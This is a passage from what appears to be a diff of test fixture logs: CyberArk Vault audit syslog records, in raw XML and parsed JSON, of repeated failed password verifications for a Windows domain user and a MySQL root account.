Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:33:26</Timestamp>\n    <IsoTimestamp>2021-03-15T13:33:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615815206\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:04:11</Timestamp>\n    <IsoTimestamp>2021-03-15T15:04:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=1;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615820651\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 09:35:01</Timestamp>\n    <IsoTimestamp>2021-03-15T16:35:01Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=2;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"2\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615826099\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <7>1 2021-03-15T16:56:29Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 09:56:29</Timestamp>\n    <IsoTimestamp>2021-03-15T16:56:29Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Database-MySQL-10.0.1.20-root</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n</Reason>\n    <ExtraDetails>address=10.0.1.20;username=root;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"MySQL\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"root\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"10.0.1.20\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615827245\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Database\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:56:29","IsoTimestamp":"2021-03-15T16:56:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827245"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
 <7>1 2021-03-15T17:01:07Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 10:01:07</Timestamp>\n    <IsoTimestamp>2021-03-15T17:01:07Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Database-MySQL-10.0.1.20-root</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n</Reason>\n    <ExtraDetails>address=10.0.1.20;username=root;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"MySQL\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"root\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"10.0.1.20\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615827554\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"DSN\" Value=\"mariadb\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Database\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:01:07","IsoTimestamp":"2021-03-15T17:01:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827554"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"mariadb"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
 <7>1 2021-03-15T17:05:47Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 10:05:47</Timestamp>\n    <IsoTimestamp>2021-03-15T17:05:47Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Database-MySQL-10.0.1.20-root</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n</Reason>\n    <ExtraDetails>address=10.0.1.20;username=root;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"MySQL\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"root\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"10.0.1.20\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615827864\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"DSN\" Value=\"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Database\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:05:47","IsoTimestamp":"2021-03-15T17:05:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827864"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
@@ -11,5 +11,5 @@
 <7>1 2021-03-15T17:33:17Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 10:33:17</Timestamp>\n    <IsoTimestamp>2021-03-15T17:33:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Database-MySQL-10.0.1.20-root</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n</Reason>\n    <ExtraDetails>address=127.0.0.1;username=root;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"MySQL\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"root\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"127.0.0.1\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615829597\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"Port\" Value=\"3306\"></CAProperty>\n      <CAProperty Name=\"Database\" Value=\"test\"></CAProperty>\n      <CAProperty Name=\"DSN\" Value=\"mysql\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Database\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:33:17","IsoTimestamp":"2021-03-15T17:33:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password 